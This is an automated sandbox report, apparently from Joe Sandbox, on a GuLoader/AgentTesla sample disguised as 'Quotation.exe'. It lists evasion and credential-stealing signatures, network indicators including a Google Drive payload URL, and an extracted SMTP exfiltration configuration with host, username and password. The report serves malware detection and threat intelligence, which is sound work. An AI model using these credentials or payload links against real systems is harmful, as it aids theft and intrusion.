Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation.exe

Overview

General Information

Sample name:Quotation.exe
Analysis ID:1549339
MD5:816b7984251ee4c846a7f0d6160624e2
SHA1:be82357d711260a412103e7fde8785febd060974
SHA256:648ee80543d70f070c497309e4c7ce090254374da938799074de93bdaafaff5a
Tags:exeuser-threatcat_ch
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
AI detected suspicious sample
Contains functionality to register a low level keyboard hook
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Quotation.exe (PID: 2436 cmdline: "C:\Users\user\Desktop\Quotation.exe" MD5: 816B7984251EE4C846A7F0D6160624E2)
    • Quotation.exe (PID: 1516 cmdline: "C:\Users\user\Desktop\Quotation.exe" MD5: 816B7984251EE4C846A7F0D6160624E2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.showpiece.trillennium.biz", "Username": "build@showpiece.trillennium.biz", "Password": "3KJ[T.3]fsSW"}
SourceRuleDescriptionAuthorStrings
00000009.00000002.2518927845.00000000350DC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000009.00000002.2518927845.00000000350E4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000009.00000002.2518927845.00000000350B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000009.00000002.2518927845.00000000350B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.1666164955.00000000059B8000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 2 entries

            System Summary

            barindex
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 67.23.226.139, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Quotation.exe, Initiated: true, ProcessId: 1516, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49993
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-05T15:07:22.327002+010020229301A Network Trojan was detected172.202.163.200443192.168.2.749736TCP
            2024-11-05T15:07:50.887278+010020229301A Network Trojan was detected172.202.163.200443192.168.2.749919TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-05T15:07:54.512032+010028032702Potentially Bad Traffic192.168.2.749936172.217.18.14443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Quotation.exe.1516.9.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.showpiece.trillennium.biz", "Username": "build@showpiece.trillennium.biz", "Password": "3KJ[T.3]fsSW"}
            Source: Quotation.exeReversingLabs: Detection: 39%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Quotation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:49936 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.7:49947 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.7:49977 version: TLS 1.2
            Source: Quotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004066F7 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004066F7
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004065AD FindFirstFileW,FindClose,0_2_004065AD
            Source: global trafficTCP traffic: 192.168.2.7:49993 -> 67.23.226.139:587
            Source: Joe Sandbox ViewIP Address: 67.23.226.139 67.23.226.139
            Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
            Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
            Source: Joe Sandbox ViewASN Name: DIMENOCUS DIMENOCUS
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.7:49736
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.7:49919
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49936 -> 172.217.18.14:443
            Source: global trafficTCP traffic: 192.168.2.7:49993 -> 67.23.226.139:587
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1bbmPht414dtBMJVsXpJfN6hufkXy59VA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1bbmPht414dtBMJVsXpJfN6hufkXy59VA&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1bbmPht414dtBMJVsXpJfN6hufkXy59VA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1bbmPht414dtBMJVsXpJfN6hufkXy59VA&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: global trafficDNS traffic detected: DNS query: mail.showpiece.trillennium.biz
            Source: Quotation.exe, 00000009.00000002.2518927845.00000000350DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.showpiece.trillennium.biz
            Source: Quotation.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error...
            Source: Quotation.exe, 00000009.00000002.2519603323.00000000371A0000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000009.00000002.2518927845.00000000350E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000009.00000003.1869287899.00000000371A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
            Source: Quotation.exe, 00000009.00000002.2519603323.00000000371A0000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000009.00000002.2518927845.00000000350E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000009.00000003.1869287899.00000000371A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
            Source: Quotation.exe, 00000009.00000002.2518927845.0000000035061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Quotation.exe, 00000009.00000002.2518927845.00000000350DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://showpiece.trillennium.biz
            Source: Quotation.exe, 00000009.00000002.2519603323.00000000371A0000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000009.00000002.2518927845.00000000350E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000009.00000003.1869287899.00000000371A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: Quotation.exe, 00000009.00000002.2519603323.00000000371A0000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000009.00000002.2518927845.00000000350E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000009.00000003.1869287899.00000000371A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: Quotation.exe, 00000009.00000002.2519704345.0000000037219000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/03
            Source: Quotation.exe, 00000009.00000002.2518927845.0000000035061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: Quotation.exe, 00000009.00000002.2518927845.0000000035061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: Quotation.exe, 00000009.00000002.2518927845.0000000035061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
            Source: Quotation.exe, 00000009.00000003.1758037630.0000000004CB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: Quotation.exe, 00000009.00000002.2499184774.0000000004C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: Quotation.exe, 00000009.00000002.2499184774.0000000004C6C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000009.00000002.2499404125.0000000004FC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1bbmPht414dtBMJVsXpJfN6hufkXy59VA
            Source: Quotation.exe, 00000009.00000002.2499184774.0000000004C6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1bbmPht414dtBMJVsXpJfN6hufkXy59VAZH4
            Source: Quotation.exe, 00000009.00000002.2499184774.0000000004CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: Quotation.exe, 00000009.00000002.2499184774.0000000004CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/$K
            Source: Quotation.exe, 00000009.00000002.2499184774.0000000004C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1bbmPht414dtBMJVsXpJfN6hufkXy59VA&export=download
            Source: Quotation.exe, 00000009.00000003.1758037630.0000000004CB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: Quotation.exe, 00000009.00000003.1758037630.0000000004CB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: Quotation.exe, 00000009.00000003.1758037630.0000000004CB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: Quotation.exe, 00000009.00000003.1758037630.0000000004CB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: Quotation.exe, 00000009.00000003.1758037630.0000000004CB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
            Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:49936 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.7:49947 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.7:49977 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 9_2_385E8828 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,385E9658,00000000,000000009_2_385E8828
            Source: C:\Users\user\Desktop\Quotation.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Quotation.exeJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: Quotation.exe
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004036DA EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,LdrInitializeThunk,CharNextW,LdrInitializeThunk,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,0_2_004036DA
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_73C623510_2_73C62351
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 9_2_0015A9609_2_0015A960
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 9_2_00154A989_2_00154A98
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 9_2_00153E809_2_00153E80
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 9_2_001541C89_2_001541C8
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 9_2_381031289_2_38103128
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 9_2_38744B489_2_38744B48
            Source: Quotation.exeStatic PE information: invalid certificate
            Source: Quotation.exe, 00000009.00000002.2499184774.0000000004CAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Quotation.exe
            Source: Quotation.exe, 00000009.00000002.2518815016.0000000034E59000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Quotation.exe
            Source: Quotation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/12@5/4
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004036DA EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,LdrInitializeThunk,CharNextW,LdrInitializeThunk,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,0_2_004036DA
            Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\overlaysJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsfDAFB.tmpJump to behavior
            Source: Quotation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Quotation.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Quotation.exeReversingLabs: Detection: 39%
            Source: C:\Users\user\Desktop\Quotation.exeFile read: C:\Users\user\Desktop\Quotation.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"
            Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"
            Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile written: C:\Users\user\Music\antithetic.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: Quotation.exeStatic file information: File size 1182800 > 1048576
            Source: Quotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.1666164955.00000000059B8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_73C62351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73C62351
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 9_2_00150C45 push ebx; retf 9_2_00150C52
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 9_2_00150C6D push edi; retf 9_2_00150C7A
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 9_2_385E76D8 push esp; iretd 9_2_385E76E9
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 9_2_385E80D8 push es; ret 9_2_385E80E5
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 9_2_38740500 push dword ptr [ebp+ecx-75h]; retf 9_2_38740507
            Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\nsbDE39.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
